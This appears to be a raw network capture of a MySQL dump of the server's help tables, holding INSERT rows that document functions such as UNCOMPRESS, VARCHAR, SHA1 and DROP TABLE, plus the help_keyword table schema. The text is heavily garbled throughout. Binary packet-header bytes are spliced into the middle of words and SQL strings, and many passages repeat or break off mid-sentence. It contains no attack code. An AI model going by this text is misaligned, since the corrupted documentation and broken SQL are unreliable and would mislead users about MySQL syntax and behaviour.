)SS(string_to_uncompress)\nUncompresses a string compressed by the COMPRESS() function.\nIf the argument is not a compressed value, the result is NULL.\nThis function requires MySQL to have been compiled with a compression library\nsuch as zlib. Otherwise, the return value is always NULL.\n','mysql> SELECT UNCOMPRESS(COMPRESS(\'any string\'));\n -> \'any string\'\nmysql> SELECT UNCOMPRESS(\'any string\');\n -> NULL',''),(192,'ISSIMPLE',19,' IsSimple(g)\n\nCurrently, this function is a placeholder and should not be used.\nIf implemented, its behavior will be as described in the next paragraph.\n\nReturns 1 if the geometry value g has no anomalous geometric points,\nsuch as self-intersection or self-tangency. IsSimple() returns 0 if the\nargument is not simple, and -1 if it is NULL.\n\nThe description of each instantiable geometric class given earlier in\nthe chapter includes the specific conditions that cause an instance of\nthat class to be classified as not simple.\n','',''),(193,'- BINARY',4,' -\nSubtraction:\n','mysql> SELECT 3-5;\n -> -2',''),(194,'GEOMCOLLFROMTEXT',3,' GeomCollFromText(wkt[,srid])\n GeometryCollectionFromText(wkt[,srid])\nConstructs a GEOMETRYCOLLECTION value using its WKT representation and SRID.\n','',''),(195,'WKT DCZZ0`BiEL@/o0  E4\"@@\ 3 P{Zr"l )"^lCʕbbBi0`ET@/p܂Ao0E<3@?UD  3P$u}U \ )EFINITION',3,'The Well-Known Text (WKT) representation of Geometry is designed to\nexchange geometry data in ASCII form.\n','',''),(196,'CURRENT_TIME',14,' CURRENT_TIME\n CURRENT_TIME()\n\nCURRENT_TIME and CURRENT_TIME() are synonyms for\nCURTIME().\n','',''),(197,'LAST_INSERT_ID',25,' LAST_INSERT_ID()\n LAST_INSERT_ID(expr)\nReturns the last automatically generated value that was inserted into\nan AUTO_INCREMENT column.\n','mysql> SELECT LAST_INSERT_ID();\n -> 195',''),(198,'LAST_DAY',14,' LAST_DAY(date)\n\nTakes a date or datetime value and returns the corresponding value for the\nlast day of the month. Returns NULL if the argument is invalid.\n','mysql> SELECT LAST_DAY(\'2003-02-05\');\n -> \'2003-02-28\'\nmysql> SELECT LAST_DAY(\'2004-02-05\');\n -> \'2004-02-29\'\nmysql> SELECT LAST_DAY(\'2004-01-01 01:01:01\');\n -> \'2004-01-31\'\nmysql> SELECT LAST_DAY(\'2003-03-32\');\n -> NULL',''),(199,'MEDIUMINT',1,' MEDIUMINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA medium-size integer. The signed range is -8388608 to\n8388607. The unsigned range is 0 to 16777215.\n','',''),(200,'FLOOR',4,' FLOOR(X)\nReturns the largest integer value not greater than X.\n','mysql> SELECT FLOOR(1.23);\n -> 1\nmysql> SELECT FLOOR(-1.23);\n CԕbbBi0`ET@/ԂSŀo0E SELECT LAST_INSERT_ID();\n -> 195',''),(198,'LAST_DAY',14,' LAST_DAY(date)\n\nTakes a date or datetime value and returns the corresponding value for the\nlast day of the month. Returns NULL if the argument is invalid.\n','mysql> SELECT LAST_DAY(\'2003-02-05\');\n -> \'2003-02-28\'\nmysql> SELECT LAST_DAY(\'2004-02-05\');\n -> \'2004-02-29\'\nmysql> SELECT LAST_DAY(\'2004-01-01 01:01:01\');\n -> \'2004-01-31\'\nmysql> SELECT LAST_DAY(\'2003-03-32\');\n -> NULL',''),(199,'MEDIUMINT',1,' MEDIUMINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA medium-size integer. The signed range is -8388608 to\n8388607. The unsigned range is 0 to 16777215.\n','',''),(200,'FLOOR',4,' FLOOR(X)\nReturns the largest integer value not greater than X.\n','mysql> SELECT FLOOR(1.23);\n -> 1\nmysql> SELECT FLOOR(-1.23);\n Cbb0`BiET@/g܀o0AE -2',''),(201,'RTRIM',23,' RTRIM(str)\nReturns the string str with trailing space characters removed.\n','mysql> SELECT RTRIM(\'barbar \');\n -> \'barbar\'',''),(202,'DEGREES',4,' DEGREES(X)\nReturns the argument X, converted from radians to degrees.\n','mysql> SELECT DEGREES(PI());\n -> 180.000000',''),(203,'EXPLAIN',6,'The EXPLAIN statement can be used either as a synonym for\nDESCRIBE or as a way to obtain information about how MySQL executes\na SELECT statement:\n\n --- The EXPLAIN tbl_name syntax is synonymous with DESCRIBE tbl_name\nor\nSHOW COLUMNS FROM tbl_name.\n --- When you precede a SELECT statement with the keyword EXPLAIN,\nMySQL explains how it would process the SELECT, providing\ninformation about how tables are joined and in which order.\n','EXPLAIN tbl_name',''),(204,'VARCHAR',1,' [NATIONAL] VARCHAR(M) [BINARY]\n\nA variable-length string. M represents the maximum column length.\nThe range of M is 1 to 255 before MySQL 4.0.2, 0 to 255 as of MySQL\n4.0.2, and 0 to 65,535 as of MySQL 5.0.3. (The maximum actual length of a\nVARCHAR in MySQL 5.0 is determined by the maximum row size and the\ncharacter set you use. The maximum effective length is 65,532 bytes.)\n\nNote: Before 5.0.3, trailing spaces were removed when\nVARCHAR CJbb0`BiET@/Ԁo0SE<4@@TC  3P,u}U /F ) -> -2',''),(201,'RTRIM',23,' RTRIM(str)\nReturns the string str with trailing space characters removed.\n','mysql> SELECT RTRIM(\'barbar \');\n -> \'barbar\'',''),(202,'DEGREES',4,' DEGREES(X)\nReturns the argument X, converted from radians to degrees.\n','mysql> SELECT DEGREES(PI());\n -> 180.000000',''),(203,'EXPLAIN',6,'The EXPLAIN statement can be used either as a synonym for\nDESCRIBE or as a way to obtain information about how MySQL executes\na SELECT statement:\n\n --- The EXPLAIN tbl_name syntax is synonymous with DESCRIBE tbl_name\nor\nSHOW COLUMNS FROM tbl_name.\n --- When you precede a SELECT statement with the keyword EXPLAIN,\nMySQL explains how it would process the SELECT, providing\ninformation about how tables are joined and in which order.\n','EXPLAIN tbl_name',''),(204,'VARCHAR',1,' [NATIONAL] VARCHAR(M) [BINARY]\n\nA variable-length string. M represents the maximum column length.\nThe range of M is 1 to 255 before MySQL 4.0.2, 0 to 255 as of MySQL\n4.0.2, and 0 to 65,535 as of MySQL 5.0.3. (The maximum actual length of a\nVARCHAR in MySQL 5.0 is determined by the maximum row size and the\ncharacter set you use. The maximum effective length is 65,532 bytes.)\n\nNote: Before 5.0.3, trailing spaces were removed when\nVARCHAR CbbBi0`ET@/p܂Ao0E<5@?UB  3P4u}U [ )values were stored, which differs from the standard SQL\nspecification.\n\nFrom MySQL 4.1.0 to 5.0.2, a VARCHAR column with a length\nspecification greater than 255 is converted to the smallest TEXT\ntype that can hold values of the given length. For example,\nVARCHAR(500) is converted to TEXT, and\nVARCHAR(200000) is converted to MEDIUMTEXT. This is a\ncompatibility feature. However, this conversion affects trailing-space\nremoval.\n\nVARCHAR is shorthand for CHARACTER VARYING.\n\nAs of MySQL 4.1.2, the BINARY attribute is shorthand for specifying\nthe binary collation of the column character set. Sorting and comparison is\nbased on numeric character values. Before 4.1.2, BINARY attribute\ncauses the column to be treated as a binary string. Sorting and comparison\nis based on numeric byte values.\n\nStarting from MySQL 5.0.3, VARCHAR is stored with a one-byte or\ntwo-byte length prefix + data. The length prefix is two bytes if the\nVARCHAR column is declared with a length greater than 255.\n','',''),(205,'UNHEX',23,' UNHEX(str)\n\nDoes the opposite of HEX(str). That is, it interprets each pair of\nhexadecimal digits in the argument as a number and converts it to the\ncharacter represented by the number. The resulting characters are returned as\na binary striCbb0`BiET@/Ԁo0SE<5@@TB  3P4u}U [ )values were stored, which differs from the standard SQL\nspecification.\n\nFrom MySQL 4.1.0 to 5.0.2, a VARCHAR column with a length\nspecification greater than 255 is converted to the smallest TEXT\ntype that can hold values of the given length. For example,\nVARCHAR(500) is converted to TEXT, and\nVARCHAR(200000) is converted to MEDIUMTEXT. This is a\ncompatibility feature. However, this conversion affects trailing-space\nremoval.\n\nVARCHAR is shorthand for CHARACTER VARYING.\n\nAs of MySQL 4.1.2, the BINARY attribute is shorthand for specifying\nthe binary collation of the column character set. Sorting and comparison is\nbased on numeric character values. Before 4.1.2, BINARY attribute\ncauses the column to be treated as a binary string. Sorting and comparison\nis based on numeric byte values.\n\nStarting from MySQL 5.0.3, VARCHAR is stored with a one-byte or\ntwo-byte length prefix + data. The length prefix is two bytes if the\nVARCHAR column is declared with a length greater than 255.\n','',''),(205,'UNHEX',23,' UNHEX(str)\n\nDoes the opposite of HEX(str). That is, it interprets each pair of\nhexadecimal digits in the argument as a number and converts it to the\ncharacter represented by the number. The resulting characters are returned as\na binary striCtZZBi0`EL@/$T<o0E4r@??  PX\|] M ^n~C~ZZBi0`EL@/$T<o0E4s@?>  PX\|s 6 ^n~CZZ0`BiEL@/o0AE4r@@?  PX\|] M ^n~CZZ0`BiEL@/o0AE4s@@>  PX\|s 6 ^n~C٧bbBi0`ET@/p܂Ao0E<6@?UA  3P SELECT UNHEX(\'4D7953514C\');\n -> \'MySQL\'\nmysql> SELECT 0x4D7953514C;\n -> \'MySQL\'\nmysql> SELECT UNHEX(HEX(\'string\'));\n -> \'string\'\nmysql> SELECT HEX(UNHEX(\'1267\'));\n -> \'1267\'',''),(206,'- UNARY',4,' -\nUnary minus. Changes the sign of the argument.\n','mysql> SELECT - 2;\n -> -2',''),(207,'COS',4,' COS(X)\nReturns the cosine of X, where X is given in radians.\n','mysql> SELECT COS(PI());\n -> -1.000000',''),(208,'DATE FUNCTION',14,' DATE(expr)\n\nExtracts the date part of the date or datetime expression expr.\n','mysql> SELECT DATE(\'2003-12-31 01:02:03\');\n -> \'2003-12-31\'',''),(209,'RESET MASTER',6,'RESET MASTER\n\nDeletes all binary logs listed in the index file,\nresets the binary log index file to be empty, and creates a new binary log\nfile.\n\nThis statement was named FLUSH MASTER before MySQL 3.23.26.\n','',''),(210,'TAN',4,' TAN(X)\nReturns the tangent of X, where X is given in radians.\n','mysql> SELECT TAN(PI()+1);\n -> 1.557408',''),(211,'PI',4,' PI()\nReturns the value of PI. The default number of decimals displayed is five, but\nMySQL internally uses the full double-precision value for PI.\n','mysql> SELECT PI();\n -> 3.141593\nmysql> SELECT PI(Cbb0`BiET@/Ԁo0SE<6@@TA  3P SELECT UNHEX(\'4D7953514C\');\n -> \'MySQL\'\nmysql> SELECT 0x4D7953514C;\n -> \'MySQL\'\nmysql> SELECT UNHEX(HEX(\'string\'));\n -> \'string\'\nmysql> SELECT HEX(UNHEX(\'1267\'));\n -> \'1267\'',''),(206,'- UNARY',4,' -\nUnary minus. Changes the sign of the argument.\n','mysql> SELECT - 2;\n -> -2',''),(207,'COS',4,' COS(X)\nReturns the cosine of X, where X is given in radians.\n','mysql> SELECT COS(PI());\n -> -1.000000',''),(208,'DATE FUNCTION',14,' DATE(expr)\n\nExtracts the date part of the date or datetime expression expr.\n','mysql> SELECT DATE(\'2003-12-31 01:02:03\');\n -> \'2003-12-31\'',''),(209,'RESET MASTER',6,'RESET MASTER\n\nDeletes all binary logs listed in the index file,\nresets the binary log index file to be empty, and creates a new binary log\nfile.\n\nThis statement was named FLUSH MASTER before MySQL 3.23.26.\n','',''),(210,'TAN',4,' TAN(X)\nReturns the tangent of X, where X is given in radians.\n','mysql> SELECT TAN(PI()+1);\n -> 1.557408',''),(211,'PI',4,' PI()\nReturns the value of PI. The default number of decimals displayed is five, but\nMySQL internally uses the full double-precision value for PI.\n','mysql> SELECT PI();\n -> 3.141593\nmysql> SELECT PI(CӨZZBi0`EL@/Ao0E4#l@?}  P:ԙb+ d 'bbBi0`ET@/p܂Ao0E<7@?U@  3PDu}U S ))+0.000000000000000000;\n -> 3.141592653589793116',''),(212,'WEEKOFYEAR',14,' WEEKOFYEAR(date)\n\nReturns the calendar week of the date as a number in the\nrange from 1 to 53. It is a compatibility function\nthat is equivalent to WEEK(date,3).\n','mysql> SELECT WEEKOFYEAR(\'1998-02-20\');\n -> 8',''),(213,'/',4,' /\nDivision:\n','mysql> SELECT 3/5;\n -> 0.60',''),(214,'STDDEV_SAMP',12,' STDDEV_SAMP(expr)\nReturns the sample standard deviation of expr (the square root of\nVAR_SAMP(). This function was added in MySQL 5.0.3.\n','',''),(215,'MLINEFROMWKB',13,' MLineFromWKB(wkb[,srid])\n MultiLineStringFromWKB(wkb[,srid])\nConstructs a MULTILINESTRING value using its WKB representation and SRID.\n','',''),(216,'UNCOMPRESSED_LENGTH',23,' UNCOMPRESSED_LENGTH(compressed_string)\nReturns the length of a compressed string before compression.\n','mysql> SELECT UNCOMPRESSED_LENGTH(COMPRESS(REPEAT(\'a\',30)));\n -> 30',''),(217,'LOG2',4,' LOG2(X)\nReturns the base-2 logarithm of X.\n','mysql> SELECT LOG2(65536);\n -> 16.000000\nmysql> SELECT LOG2(-100);\n -> NULL',''),(218,'SUBTIME',14,' SUBTIME(expr,expr2)\n\n\nSUBTIME() subtracts expr2 from expr and returns the result.\nexpr is a time or datetime expression, and expr2 isCYbb0`BiET@/Ԁo0SE<7@@T@  3PDu}U S ))+0.000000000000000000;\n -> 3.141592653589793116',''),(212,'WEEKOFYEAR',14,' WEEKOFYEAR(date)\n\nReturns the calendar week of the date as a number in the\nrange from 1 to 53. It is a compatibility function\nthat is equivalent to WEEK(date,3).\n','mysql> SELECT WEEKOFYEAR(\'1998-02-20\');\n -> 8',''),(213,'/',4,' /\nDivision:\n','mysql> SELECT 3/5;\n -> 0.60',''),(214,'STDDEV_SAMP',12,' STDDEV_SAMP(expr)\nReturns the sample standard deviation of expr (the square root of\nVAR_SAMP(). This function was added in MySQL 5.0.3.\n','',''),(215,'MLINEFROMWKB',13,' MLineFromWKB(wkb[,srid])\n MultiLineStringFromWKB(wkb[,srid])\nConstructs a MULTILINESTRING value using its WKB representation and SRID.\n','',''),(216,'UNCOMPRESSED_LENGTH',23,' UNCOMPRESSED_LENGTH(compressed_string)\nReturns the length of a compressed string before compression.\n','mysql> SELECT UNCOMPRESSED_LENGTH(COMPRESS(REPEAT(\'a\',30)));\n -> 30',''),(217,'LOG2',4,' LOG2(X)\nReturns the base-2 logarithm of X.\n','mysql> SELECT LOG2(65536);\n -> 16.000000\nmysql> SELECT LOG2(-100);\n -> NULL',''),(218,'SUBTIME',14,' SUBTIME(expr,expr2)\n\n\nSUBTIME() subtracts expr2 from expr and returns the result.\nexpr is a time or datetime expression, and expr2 isCZZBi0`EL@/Ao0E4#n@?{  P:ԙg3!`` d' SELECT SUBTIME(\'1997-12-31 23:59:59.999999\',\n -> \'1 1:1:1.000002\');\n -> \'1997-12-30 22:58:58.999997\'\nmysql> SELECT SUBTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'-00:59:59.999999\'',''),(219,'DROP TABLE',28,'DROP TABLE removes one or more tables. You must have the DROP\nprivilege for each table. All table data and the table\ndefinition are /removed/, so /be careful/ with this statement!\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring for tables that don\'t exist. As of\nMySQL 4.1, a NOTE is generated for each non-existent table when\nusing IF EXISTS.\nSee also : [SHOW WARNINGS, , SHOW WARNINGS].\n\nRESTRICT and CASCADE are allowed to make porting easier.\nFor the moment, they do nothing.\n\nNote: DROP TABLE automatically commits the current\nactive transaction, unless you are using MySQL 4.1 or higher and the\nTEMPORARY keyword.\n','DROP [TEMPORARY] TABLE [IF EXISTS]\n tbl_name [, tbl_name] ...\n [RESTRICT | CASCADE]',''),(220,'DUAL',22,'SELECT ... FROM DUAL is an alias for SELECT ....\n(To be compatible with some other databases).\n','',''),(221,'INSTR',23,' INSTR(str,substr)\nReturns the position of the first occurrence of sCbb0`BiET@/Ԁo0SE<8@@T?  3PLu}U  ) a time\nexpression.\n','mysql> SELECT SUBTIME(\'1997-12-31 23:59:59.999999\',\n -> \'1 1:1:1.000002\');\n -> \'1997-12-30 22:58:58.999997\'\nmysql> SELECT SUBTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'-00:59:59.999999\'',''),(219,'DROP TABLE',28,'DROP TABLE removes one or more tables. You must have the DROP\nprivilege for each table. All table data and the table\ndefinition are /removed/, so /be careful/ with this statement!\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring for tables that don\'t exist. As of\nMySQL 4.1, a NOTE is generated for each non-existent table when\nusing IF EXISTS.\nSee also : [SHOW WARNINGS, , SHOW WARNINGS].\n\nRESTRICT and CASCADE are allowed to make porting easier.\nFor the moment, they do nothing.\n\nNote: DROP TABLE automatically commits the current\nactive transaction, unless you are using MySQL 4.1 or higher and the\nTEMPORARY keyword.\n','DROP [TEMPORARY] TABLE [IF EXISTS]\n tbl_name [, tbl_name] ...\n [RESTRICT | CASCADE]',''),(220,'DUAL',22,'SELECT ... FROM DUAL is an alias for SELECT ....\n(To be compatible with some other databases).\n','',''),(221,'INSTR',23,' INSTR(str,substr)\nReturns the position of the first occurrence of sCZZBi0`EL@/Ao0E4#p@?y  P:ԙl;!`U d'  3P Tu}U  )ubstring substr in\nstring str. This is the same as the two-argument form of\nLOCATE(), except that the arguments are swapped.\n','mysql> SELECT INSTR(\'foobarbar\', \'bar\');\n -> 4\nmysql> SELECT INSTR(\'xbar\', \'foobar\');\n -> 0',''),(222,'NOW',14,' NOW()\n\nReturns the current date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT NOW();\n -> \'1997-12-15 23:50:26\'\nmysql> SELECT NOW() + 0;\n -> 19971215235026',''),(223,'>=',26,' >=\nGreater than or equal:\n','mysql> SELECT 2 >= 2;\n -> 1',''),(224,'EXP',4,' EXP(X)\nReturns the value of e (the base of natural logarithms) raised to\nthe power of X.\n','mysql> SELECT EXP(2);\n -> 7.389056\nmysql> SELECT EXP(-2);\n -> 0.135335',''),(225,'SHA',17,' SHA1(str)\n SHA(str)\nCalculates an SHA1 160-bit checksum for the string, as described in\nRFC 3174 (Secure Hash Algorithm). The value is returned as a string of 40 hex\ndigits, or NULL if the argument was NULL.\nOne of the possible uses for this function is as a hash key. You can\nalso use it as a cryptographically safe function for storing passwords.\n','mysql> SELECT SHA1(\'abc\');\n -> \Cbb0`BiET@/Ԁo0SE<9@@T>  3P Tu}U  )ubstring substr in\nstring str. This is the same as the two-argument form of\nLOCATE(), except that the arguments are swapped.\n','mysql> SELECT INSTR(\'foobarbar\', \'bar\');\n -> 4\nmysql> SELECT INSTR(\'xbar\', \'foobar\');\n -> 0',''),(222,'NOW',14,' NOW()\n\nReturns the current date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT NOW();\n -> \'1997-12-15 23:50:26\'\nmysql> SELECT NOW() + 0;\n -> 19971215235026',''),(223,'>=',26,' >=\nGreater than or equal:\n','mysql> SELECT 2 >= 2;\n -> 1',''),(224,'EXP',4,' EXP(X)\nReturns the value of e (the base of natural logarithms) raised to\nthe power of X.\n','mysql> SELECT EXP(2);\n -> 7.389056\nmysql> SELECT EXP(-2);\n -> 0.135335',''),(225,'SHA',17,' SHA1(str)\n SHA(str)\nCalculates an SHA1 160-bit checksum for the string, as described in\nRFC 3174 (Secure Hash Algorithm). The value is returned as a string of 40 hex\ndigits, or NULL if the argument was NULL.\nOne of the possible uses for this function is as a hash key. You can\nalso use it as a cryptographically safe function for storing passwords.\n','mysql> SELECT SHA1(\'abc\');\n -> \CZZBi0`EL@/܂Sŀo0E4\$@?Z 3 P{Zz"l )%^CZZ0`BiEL@/o0  E4\$@@Z 3 P{Zz"l )%^CXbbBi0`ET@/p܂Ao0E SELECT TAN(PI()+1);\n -> 1.557408',''),(211,'PI',4,' PI()\nReturns the value of PI. The default number of decimals displayed is five, but\nMySQL internally uses the full double-precision value for PI.\n','mysql> SELECT PI();\n -> 3.141593\nmysql> SELECT PI()+0.000000000000000000;\n -> 3.141592653589793116',''),(212,'WEEKOFYEAR',14,' WEEKOFYEAR(date)\n\nReturns the calendar week of the date as a number in the\nrange from 1 to 53. It is a compatibility function\nthat is equivalent to WEEK(date,3).\n','mysql> SELECT WEEKOFYEAR(\'1998-02-20\');\n -> 8',''),(213,'/',4,' /\nDivision:\n','mysql> SELECT 3/5;\n -> 0.60',''),(214,'STDDEV_SAMP',12,' STDDEV_SAMP(expr)\nReturns the sample standard deviation of expr (the square root of\nVAR_SAMP(). This function was added in MySQL 5.0.3.\n','',''),(215,'MLINEFROMWKB',13,' MLineFromWKB(wkb[,srid])\n MultiLineStringFromWKB(wkb[,srid])\nConstructs a MCtbb0`BiET@/Ԁo0SE SELECT TAN(PI()+1);\n -> 1.557408',''),(211,'PI',4,' PI()\nReturns the value of PI. The default number of decimals displayed is five, but\nMySQL internally uses the full double-precision value for PI.\n','mysql> SELECT PI();\n -> 3.141593\nmysql> SELECT PI()+0.000000000000000000;\n -> 3.141592653589793116',''),(212,'WEEKOFYEAR',14,' WEEKOFYEAR(date)\n\nReturns the calendar week of the date as a number in the\nrange from 1 to 53. It is a compatibility function\nthat is equivalent to WEEK(date,3).\n','mysql> SELECT WEEKOFYEAR(\'1998-02-20\');\n -> 8',''),(213,'/',4,' /\nDivision:\n','mysql> SELECT 3/5;\n -> 0.60',''),(214,'STDDEV_SAMP',12,' STDDEV_SAMP(expr)\nReturns the sample standard deviation of expr (the square root of\nVAR_SAMP(). This function was added in MySQL 5.0.3.\n','',''),(215,'MLINEFROMWKB',13,' MLineFromWKB(wkb[,srid])\n MultiLineStringFromWKB(wkb[,srid])\nConstructs a MCּZZBi0`EL@/< o0E4 @?#  gPa8Z f' E^VCZZ0`BiEL@/o0  E4 @@#  gPa8Z f' E^VC?bbBi0`ET@/p܂Ao0E SELECT UNCOMPRESSED_LENGTH(COMPRESS(REPEAT(\'a\',30)));\n -> 30',''),(217,'LOG2',4,' LOG2(X)\nReturns the base-2 logarithm of X.\n','mysql> SELECT LOG2(65536);\n -> 16.000000\nmysql> SELECT LOG2(-100);\n -> NULL',''),(218,'SUBTIME',14,' SUBTIME(expr,expr2)\n\n\nSUBTIME() subtracts expr2 from expr and returns the result.\nexpr is a time or datetime expression, and expr2 is a time\nexpression.\n','mysql> SELECT SUBTIME(\'1997-12-31 23:59:59.999999\',\n -> \'1 1:1:1.000002\');\n -> \'1997-12-30 22:58:58.999997\'\nmysql> SELECT SUBTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'-00:59:59.999999\'',''),(219,'DROP TABLE',28,'DROP TABLE removes one or more tables. You must have the DROP\nprivilege for each table. All table data and the table\ndefinition are /removed/, so /be careful/ with this statement!\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring for tables that don\'t exist. As of\nMySQL 4.1, a NOTE is generated for each non-existent table wheCIZZBi0`EL@/Ao0E4#t@?u  P:ԙ{S!`9 d' SELECT UNCOMPRESSED_LENGTH(COMPRESS(REPEAT(\'a\',30)));\n -> 30',''),(217,'LOG2',4,' LOG2(X)\nReturns the base-2 logarithm of X.\n','mysql> SELECT LOG2(65536);\n -> 16.000000\nmysql> SELECT LOG2(-100);\n -> NULL',''),(218,'SUBTIME',14,' SUBTIME(expr,expr2)\n\n\nSUBTIME() subtracts expr2 from expr and returns the result.\nexpr is a time or datetime expression, and expr2 is a time\nexpression.\n','mysql> SELECT SUBTIME(\'1997-12-31 23:59:59.999999\',\n -> \'1 1:1:1.000002\');\n -> \'1997-12-30 22:58:58.999997\'\nmysql> SELECT SUBTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'-00:59:59.999999\'',''),(219,'DROP TABLE',28,'DROP TABLE removes one or more tables. You must have the DROP\nprivilege for each table. All table data and the table\ndefinition are /removed/, so /be careful/ with this statement!\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring for tables that don\'t exist. As of\nMySQL 4.1, a NOTE is generated for each non-existent table wheCsZZ0`BiEL@/܀o0SE4#t@@u  P:ԙ{S!`9 d' SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(PointN(GeomFromText(@ls),2));\n+-------------------------------------+\n| AsText(PointN(GeomFromText(@ls),2)) |\n+-------------------------------------+\n| POINT(2 2) |\n+-------------------------------------+',''),(228,'SUM',12,' SUM([DISTINCT] expr)\nReturns the sum of expr. If the return set has no rows,\nSUM() returns NULL.\nThe DISTINCT keyword can be used as of MySQL 5.0.0 to sum only the\ndistinct values of expr.\n','',''),(229,'OCT',23,' OCT(N)\nReturns a string representation of the octal value of N, where\nN is a longlong (BIGINT)number. This is equivalent to\nCONV(N,10,8).\nReturns NULL if N isCbb0`BiET@/Ԁo0SE<:@@T=  3P\u}U ": )'a9993e364706816aba3e25717850c26c9cd0d89d\'',''),(226,'LONGBLOB',1,' LONGBLOB\n\nA BLOB column with a maximum length of 4,294,967,295 or\n4GB (2^32 - 1) bytes. Up to MySQL\n3.23, the client/server protocol and MyISAM tables had a limit\nof 16MB per communication packet / table row. From MySQL 4.0, the maximum\nallowed length of LONGBLOB columns depends on the\nconfigured maximum packet size in the client/server protocol and available\nmemory.\n','',''),(227,'POINTN',18,' PointN(ls,n)\nReturns the n-th point in the Linestring value ls.\nPoint numbers begin at 1.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(PointN(GeomFromText(@ls),2));\n+-------------------------------------+\n| AsText(PointN(GeomFromText(@ls),2)) |\n+-------------------------------------+\n| POINT(2 2) |\n+-------------------------------------+',''),(228,'SUM',12,' SUM([DISTINCT] expr)\nReturns the sum of expr. If the return set has no rows,\nSUM() returns NULL.\nThe DISTINCT keyword can be used as of MySQL 5.0.0 to sum only the\ndistinct values of expr.\n','',''),(229,'OCT',23,' OCT(N)\nReturns a string representation of the octal value of N, where\nN is a longlong (BIGINT)number. This is equivalent to\nCONV(N,10,8).\nReturns NULL if N isC!bbBi0`ET@/˃2o0E<-@?"  P֞%og D mMc',15,''),(25,'Information Functions',22,''),(26,'Comparison operators',22,''),(27,'Bit Functions',22,''),(28,'Data Definition',15,''); 16bd UNLOCK TABLES; /*!40000 ALTER TABLE `help_category` ENABLE KEYS */; -- -- Table structure for table `help_keyword` -- DROP TABLE IF EXISTS `help_keyword`; CREATE TABLE `help_keyword` ( `help_keyword_id` int(10) unsigned NOT NULL default '0', `name` varchar(64) NOT NULL default '', PRIMARY KEY (`help_keyword_id`), UNIQUE KEY `name` (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='help keywords'; -- -- Dumping data for table `help_keyword` -- /*!40000 ALTER TABLE `help_keyword` DISABLE KEYS */; LOCK TABLES `help_keyword` WRITE; INSERT INTO `help_keyword` VALUES (0,'MIN'),(1,'JOIN'),(2,'SERIALIZABLE'),(3,'REPLACE'),(4,'RETURNS'),(5,'MASTER_SSL_CA'),(6,'NCHAR'),(7,'COLUMNS'),(8,'WORK'),(9,'DATETIME'),(10,'MODE'),(11,'OPEN'),(12,'INTEGER'),(13,'ESCAPE'),(14,'VALUE'),(15,'GEOMETRYCOLLECTIONFROMWKB'),(16,'DROP'),(17,'SQL_BIG_RESULT'),(18,'EVENTS'),(19,'MONTH'),(20,'REGEXP'),(21,'DUPLICATE'),(22,'LINESTRINGFROMTEXT.'),(23,'UNLOCK'),(24,'INNODB'),(25,'YEAR_MONTH'),(26,'LOCK'),(27,'NDB'),(28,'CHECK'),(29,'FULL'),(30,'INT4'),(31,'BY'),(32,'NO'),(33,'MINUTE'),(34,'DATA'),(35,'DAY'),(36,'RAID_CHUNKSIZE'),(37,'SHARE'),(38C>bb0`BiET@/o0AE<-@@!  P֞%og D mMc',15,''),(25,'Information Functions',22,''),(26,'Comparison operators',22,''),(27,'Bit Functions',22,''),(28,'Data Definition',15,''); 16bd UNLOCK TABLES; /*!40000 ALTER TABLE `help_category` ENABLE KEYS */; -- -- Table structure for table `help_keyword` -- DROP TABLE IF EXISTS `help_keyword`; CREATE TABLE `help_keyword` ( `help_keyword_id` int(10) unsigned NOT NULL default '0', `name` varchar(64) NOT NULL default '', PRIMARY KEY (`help_keyword_id`), UNIQUE KEY `name` (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='help keywords'; -- -- Dumping data for table `help_keyword` -- /*!40000 ALTER TABLE `help_keyword` DISABLE KEYS */; LOCK TABLES `help_keyword` WRITE; INSERT INTO `help_keyword` VALUES (0,'MIN'),(1,'JOIN'),(2,'SERIALIZABLE'),(3,'REPLACE'),(4,'RETURNS'),(5,'MASTER_SSL_CA'),(6,'NCHAR'),(7,'COLUMNS'),(8,'WORK'),(9,'DATETIME'),(10,'MODE'),(11,'OPEN'),(12,'INTEGER'),(13,'ESCAPE'),(14,'VALUE'),(15,'GEOMETRYCOLLECTIONFROMWKB'),(16,'DROP'),(17,'SQL_BIG_RESULT'),(18,'EVENTS'),(19,'MONTH'),(20,'REGEXP'),(21,'DUPLICATE'),(22,'LINESTRINGFROMTEXT.'),(23,'UNLOCK'),(24,'INNODB'),(25,'YEAR_MONTH'),(26,'LOCK'),(27,'NDB'),(28,'CHECK'),(29,'FULL'),(30,'INT4'),(31,'BY'),(32,'NO'),(33,'MINUTE'),(34,'DATA'),(35,'DAY'),(36,'RAID_CHUNKSIZE'),(37,'SHARE'),(38CbbBi0`ET@/p܂Ao0E<;@?U<  3Pdu}U  ) NULL.\n','mysql> SELECT OCT(12);\n -> \'14\'',''),(230,'SYSDATE',14,' SYSDATE()\n\nSYSDATE() is a synonym for NOW().\n','',''),(231,'ASBINARY',13,' AsBinary(g)\nConverts a value in internal geometry format to its WKB representation\nand returns the binary result.\n','SELECT AsBinary(g) FROM geom;',''),(232,'MAKEDATE',14,' MAKEDATE(year,dayofyear)\n\nReturns a date, given year and day-of-year values.\ndayofyear must be greater than 0 or the result is NULL.\n','mysql> SELECT MAKEDATE(2001,31), MAKEDATE(2001,32);\n -> \'2001-01-31\', \'2001-02-01\'\nmysql> SELECT MAKEDATE(2001,365), MAKEDATE(2004,365);\n -> \'2001-12-31\', \'2004-12-30\'\nmysql> SELECT MAKEDATE(2001,0);\n 